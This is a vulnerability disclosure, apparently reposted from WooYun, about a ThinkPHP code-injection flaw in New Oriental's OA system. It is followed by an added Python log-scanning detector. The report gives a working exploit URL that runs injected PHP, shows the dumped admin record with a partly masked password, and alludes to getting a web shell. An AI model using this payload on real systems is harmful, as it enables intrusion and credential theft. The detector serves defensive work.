New Oriental OA system not patched in time: ThinkPHP vulnerability allows arbitrary system command execution (getshell)

2015-01-24T00:00:00
ID MYHACK58:62201558351
Type myhack58
Reporter 路人甲@乌云
Modified 2015-01-24T00:00:00

Description

Brief description:

The New Oriental OA system was not patched in time; the ThinkPHP vulnerability allows execution of arbitrary system commands (getshell).

Detailed description:


https://**.xdf.cn/mapp/index.php/module/action/param1/$%7B@print(var_dump(D(Admin)-%3Eselect()))%7D

The results are as follows:

---------

    array(1) {
      [0]=>
      array(4) {
        ["id"]=> string(1) "1"
        ["username"]=> string(5) "admin"
        ["passwd"]=> string(10) "y***CN"
        ["createtime"]=> string(19) "2014-03-11 09:37:48"
      }
    }


Vulnerability proof:

The simplest technique: bring out the "knife"......


I saw a lot of teachers online and didn't have the heart to continue, so I stopped there!
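
As an added example, not part of the original report: a log check for the request shape shown in the detailed description, a `${...}` expression placed in the path segments after index.php. The combined access-log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Request part of a combined-format access log line (the format is an assumption).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A "${...}" expression anywhere in the path info that follows a .php script.
EXPR_RE = re.compile(r'\.php/.*\$\{.*\}', re.IGNORECASE)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded braces (%257B) are also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(lines):
    """Return (line_number, decoded_path) for requests with ${...} in path info."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # malformed or non-HTTP line: nothing to inspect
        # Only the path is checked; a ${...} in the query string is not this pattern.
        path = decode_fully(urlsplit(match.group("target")).path)
        if EXPR_RE.search(path):
            hits.append((number, path))
    return hits


# Constructed sample log lines (documentation IP range, harmless print(1) marker).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jan/2015:10:00:01 +0800] "GET /mapp/index.php/module/action/param1/value1 HTTP/1.1" 200 512',
    '192.0.2.44 - - [24/Jan/2015:10:00:07 +0800] "GET /mapp/index.php/module/action/param1/$%7B@print(1)%7D HTTP/1.1" 200 733',
    '192.0.2.44 - - [24/Jan/2015:10:00:09 +0800] "GET /mapp/index.php/module/action/param1/$%257B@print(1)%257D HTTP/1.1" 200 733',
    '192.0.2.10 - - [24/Jan/2015:10:00:12 +0800] "GET /static/app.js?v=${build} HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, path in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {path}")
```

A hit only shows that the request was sent; whether it executed depends on the framework version the application runs, so matches should be correlated with the response size and the deployed ThinkPHP patch level.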
